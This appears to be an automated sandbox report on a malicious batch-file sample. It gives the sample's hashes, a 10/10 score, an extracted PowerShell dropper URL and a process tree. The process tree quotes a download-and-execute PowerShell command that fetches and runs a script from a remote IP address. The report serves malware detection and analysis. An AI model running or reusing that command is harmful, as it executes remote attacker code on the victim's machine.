Analysis
- max time kernel: 130s
- max time network: 68s
- platform: windows10_x64
- resource: win10v200430
- submitted: 15-05-2020 20:10
Static task: static1

Behavioral task: behavioral1
- Sample: d4a380d12c8f386aeaa2ab8a1f33067f.bat
- Resource: win7v200430 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: d4a380d12c8f386aeaa2ab8a1f33067f.bat
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: d4a380d12c8f386aeaa2ab8a1f33067f.bat
- Size: 218B
- MD5: 67895090003d0e397d064545c799e1b7
- SHA1: b1864fd30e1c39495ed72a9cdf4744446233cc4d
- SHA256: 3c3e7899e6b30a6296d9e7e6a4c25ac2bdd7aa646176afbea2c2dc5198c2874e
- SHA512: 3492801a8dda9940ad6fdc7d76d3bd876fa7bf0ed30a62b8113ae39f460eeb7d28ff3b1db77b8c9dc61880be1c2137c1c3e68be77f1f6101741e5054599458de
- Score: 10/10
Malware Config (Extracted)
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/d4a380d12c8f386aeaa2ab8a1f33067f
Signatures

- Program crash (1 IoC)
  Processes:
  pid  | pid_target | process      | target process
  2204 | 2028       | WerFault.exe | powershell.exe

- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  description               | pid  | process
  Token: SeRestorePrivilege | 2204 | WerFault.exe
  Token: SeBackupPrivilege  | 2204 | WerFault.exe
  Token: SeDebugPrivilege   | 2204 | WerFault.exe

- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
  pid  | process
  2204 | WerFault.exe (14 occurrences)
Processes

- C:\Windows\system32\cmd.exe (PID: 3788)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d4a380d12c8f386aeaa2ab8a1f33067f.bat"

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 2028)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d4a380d12c8f386aeaa2ab8a1f33067f');Invoke-YRZYGKQZCZH;Start-Sleep -s 10000"

    - C:\Windows\SysWOW64\WerFault.exe (PID: 2204)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 704
      Signatures:
      - Program crash
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses